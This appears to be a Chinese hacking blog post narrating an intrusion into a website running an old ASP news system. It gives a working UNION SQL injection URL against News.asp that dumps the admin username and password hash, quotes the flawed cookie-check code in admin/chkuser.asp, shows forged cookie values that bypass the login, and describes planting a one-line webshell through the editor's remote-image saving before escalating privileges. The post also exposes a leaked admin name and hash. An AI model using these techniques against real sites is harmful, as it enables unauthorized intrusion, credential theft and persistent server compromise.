1.php作者:st0p
转载请注明出处:http://www.st0p.org
看到群里的無材发来一站,打开看了一下,很像是沸腾新闻系统,不过版本写的是V0.1,网上没找到相应的版本,
发现有1.1和0.45两个版本,记得在News.asp存在注入来着,试了一下,的确可以,不过因为版本不同,所以news表的字段不同,所有语句有点不同.
经过st0p的尝试,目标站应该是0.45的,通过以下语句成功得到后台用户名和密码HASH,我是试到27个字段时成功的..
http://st0p.org/News.asp?click=1&shu=20%201%20as%20NewsID,username%20as%20title,3%20as%20updatetime,passwd%20as%20click,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20admin%20%20order%20by%202%20desc%20union%20select%20top%202
看到没,我们得到了用户名xcb,密码为c95ca278a74775f8,然后我们去破解MD5,郁闷,查不到,无法破解,难道无法进入后台来着...
然后我查看了一下0.45版的代码,发现了验证用户登陆的部分在admin/chkuser.asp中,我们看一下代码
IF not(Request.cookies("KEY")="super" or Request.cookies("KEY")="check" or Request.cookies("KEY")="typemaster" or Request.cookies("KEY")="bigmaster" or Request.cookies("KEY")="smallmaster" or Request.cookies("KEY")="selfreg") THEN
'首先检测cookies中的key,如果不为上面的值,自动转向登陆页面
response.redirect "login.asp"
response.end
END IF
set urs=server.createobject("adodb.recordset")
sql="select * from admin where username='"&Request.cookies("username")&"'"
'查询cookies中username是否是管理用户
urs.open sql,conn,1,3
if urs.bof or urs.eof then
response.redirect "login.asp"
response.end
end if
IF Request.cookies("passwd")<>urs("passwd") THEN
'如果用户存在,验诈cookies中的passwd字段是否和用户的密码HASH相同,不同则转向
response.redirect "login.asp"
response.end
END IF
urs.close
set urs=nothing
%>
嘿嘿,运气还真好,虽然无法破解密码HASH,但可以利用它实现欺骗.看利用过程..
我们用domain打开http://st0p.org/admin/index.asp,这时他会转到login.asp
然后我们删掉cookies中的reglevel; fullname; purview; KEY; UserName部分,
然后添加UserName=xcb; KEY=super; passwd=c95ca278a74775f8,用户名和密码自己替换,key直接用super就可以了.
我们点修改
首先,添加文章,然后在编辑器中插件图片,地址为咱们的服务器上的马,点插入,选中保存远程图片.然后提交
现在我们已经有了一句话的小马,然后该干嘛就不用我说了吧...
不过目标站的权限相当BT,只有上传目录可写,还不能删除..唉,慢慢提权吧,先记录一下...
